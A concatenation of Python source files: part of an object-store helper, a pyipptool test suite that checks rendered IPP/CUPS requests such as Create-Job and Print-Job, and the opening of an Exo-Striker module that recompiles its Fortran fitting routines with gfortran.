"object_store_check_old_style": config.object_store_check_old_style,
"file_path": config.file_path,
"umask": config.umask,
"jobs_directory": config.jobs_directory,
"new_file_path": config.new_file_path,
"object_store_cache_path": config.object_store_cache_path,
"gid": config.gid,
}
class ObjectStorePopulator:
"""Small helper for interacting with the object store and making sure all
datasets from a job end up with the same object_store_id.
"""
def __init__(self, has_object_store, user):
if hasattr(has_object_store, "object_store"):
object_store = has_object_store.object_store
else:
object_store = has_object_store
self.object_store = object_store
self.object_store_id = None
self.user = user
def set_object_store_id(self, data):
self.set_dataset_object_store_id(data.dataset)
def set_dataset_object_store_id(self, dataset):
# Create an empty file immediately. The first dataset will be
# created in the "default" store, all others will be created in
# the same store as the first.
dataset.object_store_id = self.object_store_id
try:
self.object_store.create(dataset)
except ObjectInvalid:
raise Exception("Unable to create output dataset: object store is full")
self.object_store_id = dataset.object_store_id # these will be the same thing after the first output
|
test_highlevel.py
|
import os.path
import socket
import tempfile
import textwrap
import threading
import time
from future import standard_library
with standard_library.hooks():
import http.server
import socketserver
import mock
import pytest
import pyipptool
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_ipptool_create_job_subscription_pull_delivery_method(_call_ipptool):
from pyipptool import create_job_subscription
create_job_subscription(
printer_uri='https://localhost:631/printer/p',
requesting_user_name='admin',
notify_job_id=108,
notify_recipient_uri='rss://',
notify_events=('job-completed', 'job-created', 'job-progress'),
notify_attributes='notify-subscriber-user-name',
notify_charset='utf-8',
notify_natural_language='de',
notify_time_interval=1)
request = _call_ipptool._mock_mock_calls[0][1][-1]
expected_request = textwrap.dedent("""
{
NAME "Create Job Subscription"
OPERATION "Create-Job-Subscription"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri https://localhost:631/printer/p
ATTR name requesting-user-name admin
GROUP subscription-attributes-tag
ATTR uri notify-recipient-uri rss://
ATTR keyword notify-events job-completed,job-created,job-progress
ATTR integer notify-job-id 108
ATTR keyword notify-attributes notify-subscriber-user-name
ATTR charset notify-charset utf-8
ATTR language notify-natural-language de
ATTR integer notify-time-interval 1
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_ipptool_create_printer_subscription(_call_ipptool):
from pyipptool import create_printer_subscription
create_printer_subscription(
printer_uri='https://localhost:631/classes/PUBLIC-PDF',
requesting_user_name='admin',
notify_recipient_uri='rss://',
notify_events='all',
notify_attributes='notify-subscriber-user-name',
notify_charset='utf-8',
notify_natural_language='de',
notify_lease_duration=0,
notify_time_interval=1)
request = _call_ipptool._mock_mock_calls[0][1][-1]
expected_request = textwrap.dedent("""
{
NAME "Create Printer Subscription"
OPERATION "Create-Printer-Subscription"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri https://localhost:631/classes/PUBLIC-PDF
ATTR name requesting-user-name admin
GROUP subscription-attributes-tag
ATTR uri notify-recipient-uri rss://
ATTR keyword notify-events all
ATTR keyword notify-attributes notify-subscriber-user-name
ATTR charset notify-charset utf-8
ATTR language notify-natural-language de
ATTR integer notify-time-interval 1
ATTR integer notify-lease-duration 0
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_add_modify_printer(_call_ipptool):
from pyipptool import cups_add_modify_printer
_call_ipptool.return_value = {'Tests': [{}]}
cups_add_modify_printer(
printer_uri='https://localhost:631/classes/PUBLIC-PDF',
device_uri='cups-pdf:/',
printer_is_shared=False,
)
request = _call_ipptool._mock_mock_calls[0][1][-1]
expected_request = textwrap.dedent("""
{
NAME "CUPS Add Modify Printer"
OPERATION "CUPS-Add-Modify-Printer"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri https://localhost:631/classes/PUBLIC-PDF
GROUP printer-attributes-tag
ATTR boolean printer-is-shared 0
ATTR uri device-uri cups-pdf:/
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_add_modify_printer_with_ppd(_call_ipptool):
from pyipptool import cups_add_modify_printer
_call_ipptool.return_value = {'Tests': [{}]}
with tempfile.NamedTemporaryFile('rb') as tmp:
cups_add_modify_printer(
printer_uri='https://localhost:631/classes/PUBLIC-PDF',
device_uri='cups-pdf:/',
printer_is_shared=False,
ppd_content=tmp,
)
request = _call_ipptool._mock_mock_calls[0][1][-1]
expected_request = textwrap.dedent("""
{
NAME "CUPS Add Modify Printer"
OPERATION "CUPS-Add-Modify-Printer"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri https://localhost:631/classes/PUBLIC-PDF
GROUP printer-attributes-tag
ATTR boolean printer-is-shared 0
ATTR uri device-uri cups-pdf:/
FILE %s
}""" % tmp.name).strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_get_job_attributes_with_job_id(_call_ipptool):
from pyipptool import get_job_attributes
get_job_attributes(
printer_uri='https://localhost:631/classes/PUBLIC-PDF',
job_id=2)
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Get Job Attributes"
OPERATION "Get-Job-Attributes"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri https://localhost:631/classes/PUBLIC-PDF
ATTR integer job-id 2
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_get_job_attributes_with_job_uri(_call_ipptool):
from pyipptool import get_job_attributes
get_job_attributes(
job_uri='https://localhost:631/jobs/2')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Get Job Attributes"
OPERATION "Get-Job-Attributes"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri job-uri https://localhost:631/jobs/2
}""").strip()
assert request == expected_request, request
def test_timeout():
from pyipptool import wrapper
from pyipptool.core import TimeoutError
from pyipptool.forms import get_subscriptions_form
class Handler(http.server.BaseHTTPRequestHandler):
"""
HTTP Handler that will make ipptool waiting
"""
def do_POST(self):
time.sleep(.2)
assassin = threading.Thread(target=self.server.shutdown)
assassin.daemon = True
assassin.start()
PORT = 6789
while True:
try:
httpd = socketserver.TCPServer(("", PORT), Handler)
except socket.error as exe:
if exe.errno in (48, 98):
PORT += 1
else:
raise
else:
break
httpd.allow_reuse_address = True
thread = threading.Thread(target=httpd.serve_forever)
thread.daemon = True
thread.start()
request = get_subscriptions_form.render(
{'header':
{'operation_attributes':
{'printer_uri':
'http://localhost:%s/printers/fake' % PORT}}})
old_timeout = wrapper.config['timeout']
wrapper.config['timeout'] = .1
wrapper.config['cups_uri'] = 'http://localhost:%s/' % PORT
try:
with pytest.raises(TimeoutError):
wrapper._call_ipptool(request)
finally:
wrapper.config['timeout'] = old_timeout
def test_authentication():
from pyipptool import IPPToolWrapper
wrapper = IPPToolWrapper({'login': 'ezeep',
'password': 'secret',
'cups_uri': 'http://localhost:631/'
'printers/?arg=value'})
assert (wrapper.authenticated_uri == 'http://ezeep:secret@localhost:631/'
'printers/?arg=value')
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_release_job(_call_ipptool):
from pyipptool import release_job
_call_ipptool.return_value = {'Tests': [{}]}
release_job(job_uri='ipp://cups:631/jobs/3')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Release Job"
OPERATION "Release-Job"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri job-uri ipp://cups:631/jobs/3
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cancel_job(_call_ipptool):
from pyipptool import cancel_job
_call_ipptool.return_value = {'Tests': [{}]}
cancel_job(job_uri='ipp://cups:631/jobs/12')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Cancel Job"
OPERATION "Cancel-Job"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri job-uri ipp://cups:631/jobs/12
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_add_modify_class(_call_ipptool):
from pyipptool import cups_add_modify_class
_call_ipptool.return_value = {'Tests': [{}]}
cups_add_modify_class(printer_uri='ipp://cups:631/classes/p',
printer_is_shared=True)
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Add Modify Class"
OPERATION "CUPS-Add-Modify-Class"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/classes/p
GROUP printer-attributes-tag
ATTR boolean printer-is-shared 1
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_delete_printer(_call_ipptool):
from pyipptool import cups_delete_printer
_call_ipptool.return_value = {'Tests': [{}]}
cups_delete_printer(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Delete Printer"
OPERATION "CUPS-Delete-Printer"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_delete_class(_call_ipptool):
from pyipptool import cups_delete_class
_call_ipptool.return_value = {'Tests': [{}]}
cups_delete_class(printer_uri='ipp://cups:631/classes/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Delete Class"
OPERATION "CUPS-Delete-Class"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/classes/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_get_classes(_call_ipptool):
from pyipptool import cups_get_classes
_call_ipptool.return_value = {'Tests': [{}]}
cups_get_classes()
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Get Classes"
OPERATION "CUPS-Get-Classes"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_get_printers(_call_ipptool):
from pyipptool import cups_get_printers
_call_ipptool.return_value = {'Tests': [{}]}
cups_get_printers()
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Get Printers"
OPERATION "CUPS-Get-Printers"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_get_devices(_call_ipptool):
from pyipptool import cups_get_devices
_call_ipptool.return_value = {'Tests': [{}]}
cups_get_devices()
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Get Devices"
OPERATION "CUPS-Get-Devices"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_get_ppd_with_printer_uri(_call_ipptool):
from pyipptool import cups_get_ppd
_call_ipptool.return_value = {'Tests': [{}]}
cups_get_ppd(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Get PPD"
OPERATION "CUPS-Get-PPD"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_get_ppd_with_ppd_name(_call_ipptool):
from pyipptool import cups_get_ppd
_call_ipptool.return_value = {'Tests': [{}]}
cups_get_ppd(ppd_name='ppd-for-my-printer')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Get PPD"
OPERATION "CUPS-Get-PPD"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR name ppd-name ppd-for-my-printer
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_get_ppds(_call_ipptool):
from pyipptool import cups_get_ppds
_call_ipptool.return_value = {'Tests': [{}]}
cups_get_ppds()
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Get PPDs"
OPERATION "CUPS-Get-PPDs"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_move_job(_call_ipptool):
from pyipptool import cups_move_job
_call_ipptool.return_value = {'Tests': [{}]}
cups_move_job(job_uri='ipp://cups:631/jobs/12',
job_printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Move Job"
OPERATION "CUPS-Move-Job"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri job-uri ipp://cups:631/jobs/12
GROUP job-attributes-tag
ATTR uri job-printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cups_reject_jobs(_call_ipptool):
from pyipptool import cups_reject_jobs
_call_ipptool.return_value = {'Tests': [{}]}
cups_reject_jobs(printer_uri='ipp://cups:631/printers/p',
requesting_user_name='boby')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "CUPS Reject Jobs"
OPERATION "CUPS-Reject-Jobs"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
ATTR name requesting-user-name boby
GROUP printer-attributes-tag
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_get_jobs(_call_ipptool):
from pyipptool import get_jobs
_call_ipptool.return_value = {'Tests': [{}]}
get_jobs(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Get Jobs"
OPERATION "Get-Jobs"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_get_printer_attributes(_call_ipptool):
from pyipptool import get_printer_attributes
_call_ipptool.return_value = {'Tests': [{}]}
get_printer_attributes(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Get Printer Attributes"
OPERATION "Get-Printer-Attributes"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_get_subscriptions(_call_ipptool):
from pyipptool import get_subscriptions
_call_ipptool.return_value = {'Tests': [{}]}
get_subscriptions(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Get Subscriptions"
OPERATION "Get-Subscriptions"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_get_notifications(_call_ipptool):
from pyipptool import get_notifications
_call_ipptool.return_value = {'Tests': [{}]}
get_notifications(printer_uri='ipp://cups:631/printers/p',
notify_subscription_ids=3)
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Get Notifications"
OPERATION "Get-Notifications"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
ATTR integer notify-subscription-ids 3
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_pause_printer(_call_ipptool):
from pyipptool import pause_printer
_call_ipptool.return_value = {'Tests': [{}]}
pause_printer(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Pause Printer"
OPERATION "Pause-Printer"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_hold_new_jobs(_call_ipptool):
from pyipptool import hold_new_jobs
_call_ipptool.return_value = {'Tests': [{}]}
hold_new_jobs(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Hold New Jobs"
OPERATION "Hold-New-Jobs"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_release_held_new_jobs(_call_ipptool):
from pyipptool import release_held_new_jobs
_call_ipptool.return_value = {'Tests': [{}]}
release_held_new_jobs(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Release Held New Jobs"
OPERATION "Release-Held-New-Jobs"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_resume_printer(_call_ipptool):
from pyipptool import resume_printer
_call_ipptool.return_value = {'Tests': [{}]}
resume_printer(printer_uri='ipp://cups:631/printers/p')
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Resume Printer"
OPERATION "Resume-Printer"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_cancel_subscription(_call_ipptool):
from pyipptool import cancel_subscription
_call_ipptool.return_value = {'Tests': [{}]}
cancel_subscription(printer_uri='ipp://cups:631/printers/p',
notify_subscription_id=3)
request = _call_ipptool._mock_mock_calls[0][1][0]
expected_request = textwrap.dedent("""
{
NAME "Cancel Subscription"
OPERATION "Cancel-Subscription"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
ATTR integer notify-subscription-id 3
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_create_job(_call_ipptool):
from pyipptool import create_job
_call_ipptool.return_value = {'Tests': [{}]}
create_job(printer_uri='ipp://cups:631/classes/p',
job_name='foo',
job_priority=1,
job_hold_until='indefinite',
job_sheets='standard',
multiple_document_handling='single-document',
copies=2,
finishings='punch',
page_ranges='1-6',
sides='two-sided-short-edge',
number_up=4,
orientation_requested='reverse-landscape',
media='iso-a4-white',
printer_resolution='600dpi',
print_quality='5',
ipp_attribute_fidelity=False,
job_k_octets=1024,
job_impressions=2048,
job_media_sheets=2,
auth_info='michael',
job_billing='no-idea',
)
request = _call_ipptool._mock_mock_calls[0][1][-1]
expected_request = textwrap.dedent("""
{
NAME "Create Job"
OPERATION "Create-Job"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/classes/p
ATTR name job-name foo
ATTR boolean ipp-attribute-fidelity 0
ATTR integer job-k-octets 1024
ATTR integer job-impressions 2048
ATTR integer job-media-sheets 2
GROUP job-attributes-tag
ATTR integer job-priority 1
ATTR keyword job-hold-until indefinite
ATTR keyword job-sheets standard
ATTR text auth-info "michael"
ATTR text job-billing "no-idea"
ATTR keyword multiple-document-handling single-document
ATTR integer copies 2
ATTR enum finishings punch
ATTR rangeOfInteger page-ranges 1-6
ATTR keyword sides two-sided-short-edge
ATTR integer number-up 4
ATTR enum orientation-requested reverse-landscape
ATTR keyword media iso-a4-white
ATTR resolution printer-resolution 600dpi
ATTR enum print-quality 5
}""").strip()
assert request == expected_request, request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_print_job(_call_ipptool):
from pyipptool import print_job
_call_ipptool.return_value = {'Tests': [{}]}
filename = os.path.join(os.path.dirname(__file__), 'hello.pdf')
with open(filename, 'rb') as tmp:
print_job(printer_uri='ipp://cups:631/classes/p',
job_name='foo',
requesting_user_name='john-rambo',
ipp_attribute_fidelity=False,
document_name='foo.txt',
compression='gzip',
document_format='text/plain',
document_natural_language='en',
job_k_octets=1024,
job_impressions=2048,
job_media_sheets=2,
job_priority=1,
job_hold_until='indefinite',
job_sheets='standard',
auth_info='michael',
job_billing='no-idea',
multiple_document_handling='single-document',
copies=2,
finishings='punch',
page_ranges='1-6',
sides='two-sided-short-edge',
number_up=4,
orientation_requested='reverse-landscape',
media='iso-a4-white',
printer_resolution='600dpi',
print_quality='5',
document_content=tmp.read(),
ezeep_job_uuid='bla')
request = _call_ipptool._mock_mock_calls[0][1][-1]
expected_request = textwrap.dedent("""
{
NAME "Print Job"
OPERATION "Print-Job"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/classes/p
ATTR name requesting-user-name john-rambo
ATTR name job-name foo
ATTR boolean ipp-attribute-fidelity 0
ATTR integer job-k-octets 1024
ATTR integer job-impressions 2048
ATTR integer job-media-sheets 2
ATTR name document-name foo.txt
ATTR keyword compression gzip
ATTR mimeMediaType document-format text/plain
ATTR naturalLanguage document-natural-language en
GROUP job-attributes-tag
ATTR integer job-priority 1
ATTR keyword job-hold-until indefinite
ATTR keyword job-sheets standard
ATTR text auth-info "michael"
ATTR text job-billing "no-idea"
ATTR keyword multiple-document-handling single-document
ATTR integer copies 2
ATTR enum finishings punch
ATTR rangeOfInteger page-ranges 1-6
ATTR keyword sides two-sided-short-edge
ATTR integer number-up 4
ATTR enum orientation-requested reverse-landscape
ATTR keyword media iso-a4-white
ATTR resolution printer-resolution 600dpi
ATTR enum print-quality 5
ATTR text ezeep-job-uuid "bla"
GROUP subscription-attributes-tag
GROUP document-attributes-tag
FILE /tmp/
}""").strip()
assert ('\n'.join(request.splitlines()[:-2])
== '\n'.join(expected_request.splitlines()[:-2])), request
assert expected_request.splitlines()[-2].startswith('FILE /tmp/')
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_send_document_with_file(_call_ipptool):
from pyipptool import send_document
_call_ipptool.return_value = {'Tests': [{}]}
with tempfile.NamedTemporaryFile('rb') as tmp:
send_document(printer_uri='ipp://cups:631/printers/p',
requesting_user_name='you',
document_content=tmp)
request = _call_ipptool._mock_mock_calls[0][1][-1]
expected_request = textwrap.dedent("""
{
NAME "Send Document"
OPERATION "Send-Document"
GROUP operation-attributes-tag
ATTR charset attributes-charset utf-8
ATTR language attributes-natural-language en
ATTR uri printer-uri ipp://cups:631/printers/p
ATTR name requesting-user-name you
ATTR mimeMediaType document-format application/pdf
ATTR boolean last-document 1
GROUP document-attributes-tag
FILE %s
}""" % tmp.name).strip()
assert request == expected_request
@mock.patch.object(pyipptool.wrapper, '_call_ipptool')
def test_send_document_with_binary(_call_ipptool):
from pyipptool import send_document
_call_ipptool.return_value = {'Tests': [{}]}
with open(os.path.join(os.path.dirname(__file__),
'hello.pdf'), 'rb') as tmp:
send_document(document_content=tmp.read())
assert 'FILE /tmp/' in _call_ipptool._mock_mock_calls[0][1][-1]
|
functions.py
|
#!/usr/bin/python3
__author__ = 'Trifon Trifonov'
import sys, os
#sys.path.insert(0, '../lib')
import numpy as np
import jac2astrocen
import corner
import matplotlib
matplotlib.pyplot.switch_backend('Agg')
import re
from subprocess import PIPE, Popen
import signal
import platform
import tempfile, shutil
from threading import Thread
from .Warning_log import Warning_log
import scipy.stats as pdf
import dill
from scipy.signal import argrelextrema
from scipy.ndimage import gaussian_filter
import random
import string
import ntpath
import gls as gls
TAU= 2.0*np.pi
def check_for_missing_instances(fit,fit_new):
for iii in fit.__dict__:
if iii not in fit_new.__dict__:
fit_new.__dict__[iii] = dill.copy(fit.__dict__[iii])
# elif iii in fit_new.__dict__ and len(np.atleast_1d(fit_new.__dict__[iii])) != len(np.atleast_1d(fit.__dict__[iii])):
# fit_new.__dict__[iii] = dill.copy(fit.__dict__[iii])
for iii in fit.fit_results.__dict__:
if iii not in fit_new.fit_results.__dict__:
fit_new.fit_results.__dict__[iii] = dill.copy(fit.fit_results.__dict__[iii])
if len(np.atleast_1d(fit_new.ns_sampler))!=0:
try:
fit_new.ns_sampler._lbf = dill.copy(fit_new.ns_sampler.lbf)
except:
pass
if len(np.atleast_1d(fit_new.mcmc_sampler))!=0:
try:
fit_new.mcmc_sampler._lbf = dill.copy(fit_new.mcmc_sampler.lbf)
except:
pass
if len(fit_new.tra_colors) <= 11:
fit_new.tra_colors = dill.copy(fit.tra_colors)
fit_new.tra_quadtr_jeff_pr = dill.copy(fit.tra_quadtr_jeff_pr)
fit_new.tra_jitt_use = {k: False for k in range(20)}
fit_new.tra_off_use = {k: False for k in range(20)}
fit_new.tra_dil_use = {k: False for k in range(20)}
fit_new.init_tra_jitter()
fit_new.init_tra_offset()
fit_new.init_tra_dilution()
fit_new.init_tra_lintr()
fit_new.init_tra_quadtr()
fit_new.cwd = dill.copy(fit.cwd)
return fit_new
################################## Version controll #######################################
def check_fortran_routines(path='./'):
if not os.path.exists("%s/lib/libswift.a"%path):
print("Installing the swift N-body lib for a first time!")
result6, flag6 = run_command_with_timeout('%s/install_swift.sh'%path, 600,output=True)
#print(result6)
print("Installation DONE!")
version_kep_loglik= "0.07"
result1, flag1 = run_command_with_timeout('%s/lib/fr/loglik_kep -version'%path, 1,output=True)
if flag1 == -1 or str(result1[0][0]) != version_kep_loglik:
print("New source code available: Updating Keplerian Simplex")
result1, flag1 = run_command_with_timeout('gfortran -O3 %s/source/latest_f/kepfit_amoeba.f -o %s/lib/fr/loglik_kep'%(path,path), 15,output=True)
result1, flag1 = run_command_with_timeout('%s/lib/fr/loglik_kep -version'%path, 1,output=True)
version_kep_LM= "0.07"
result2, flag2 = run_command_with_timeout('%s/lib/fr/chi2_kep -version'%path, 1,output=True)
if flag2 == -1 or str(result2[0][0]) != version_kep_LM:
print("New source code available: Updating Keplerian L-M")
result2, flag2 = run_command_with_timeout('gfortran -O3 %s/source/latest_f/kepfit_LM.f -o %s/lib/fr/chi2_kep'%(path,path), 15,output=True)
result2, flag2 = run_command_with_timeout('%s/lib/fr/chi2_kep -version'%path, 1,output=True)
version_dyn_loglik= "0.09"
result3, flag3 = run_command_with_timeout('%s/lib/fr/loglik_dyn -version'%path, 1,output=True)
if flag3 == -1 or str(result3[0][0]) != version_dyn_loglik:
print("New source code available: Updating N-body Simplex")
result3, flag3 = run_command_with_timeout('gfortran -O3 %s/source/latest_f/dynfit_amoeba.f -o %s/lib/fr/loglik_dyn'%(path,path),15,output=True)
result3, flag3 = run_command_with_timeout('%s/lib/fr/loglik_dyn -version'%path, 1,output=True)
version_dyn_LM= "0.07"
result4, flag4 = run_command_with_timeout('%s/lib/fr/chi2_dyn -version'%path, 1,output=True)
if flag4 == -1 or str(result4[0][0]) != version_dyn_LM:
print("New source code available: Updating N-body L-M")
result4, flag4 = run_command_with_timeout('gfortran -O3 %s/source/latest_f/dynfit_LM.f -o %s/lib/fr/chi2_dyn'%(path,path), 15,output=True)
result4, flag4 = run_command_with_timeout('%s/lib/fr/chi2_dyn -version'%path, 1,output=True)
version_dyn_loglik_= "0.06"
result5, flag5 = run_command_with_timeout('%s/lib/fr/loglik_dyn+ -version'%path, 1,output=True)
if flag5 == -1 or str(result5[0][0]) != version_dyn_loglik_:
print("New source code available: Updating Mixed Simplex")
result5, flag5 = run_command_with_timeout('gfortran -O3 %s/source/latest_f/dynfit_amoeba+.f -o %s/lib/fr/loglik_dyn+'%(path,path), 15,output=True)
result5, flag5 = run_command_with_timeout('%s/lib/fr/loglik_dyn+ -version'%path, 1,output=True)
try:
r1 = float(result1[0][0])
r2 = float(result2[0][0])
r3 = float(result3[0][0])
r4 = float(result4[0][0])
r5 = float(result5[0][0])
except (ImportError, KeyError, AttributeError,ValueError, IndexError) as e:
result6, flag6 = run_command_with_timeout('gfortran -v', 15,output=True)
print("""
Something went wrong!!!
Perhaps you do not have user permission to compile code in the Exo-Striker directory?
Or perhaps, you do not have 'gfortran' installed?
Trying
$ gfortran -v
returned:
%s
If 'gfortran' is not found, please install it and try again. Else, please open a GitHub issue here:
